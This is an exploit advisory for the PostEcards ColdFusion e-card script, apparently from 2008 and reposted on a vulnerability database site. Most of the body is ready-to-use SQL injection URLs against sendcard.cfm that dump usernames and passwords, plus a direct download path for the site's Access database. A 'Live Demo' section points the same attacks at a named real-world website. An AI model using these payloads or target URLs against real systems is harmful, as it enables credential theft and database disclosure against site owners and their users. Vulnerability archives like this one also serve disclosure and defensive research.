PostEcards (SQL/DD) Multiple Remote Vulnerabilities

2008-12-15 / 2008-12-16
Credit: AlpHaNiX
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

########################################################################### #-------------------------------AlpHaNiX----------------------------------# ########################################################################### #Found By : AlpHaNiX #website : www.offensivetrack.org #contact : AlpHa[AT]HACKER[DOT]BZ ########################################################################### #script : PostEcards #download : http://www.funscripts.net/old_coldfusion/download.php?fname=postcards ########################################################################### #Exploits : --=[SQL INJECTION]=-- http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00 http://www.target.com/sendcard.cfm?cid=0+union+SELECT%20null,null,pwd,null%20FROM%20USERS%00 --=[DATABASE DISCLOSURE]=-- http://www.target.com/database/postcards.mdb #Live Demo http://www.melink.com/PostCards/database/postcards.mdb http://www.melink.com/PostCards/sendcard.cfm?cid=0+union+SELECT%20null,null,username,null%20FROM%20USERS%00 #Greetz For ###########################################################################

References:

http://www.securityfocus.com/bid/32719


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top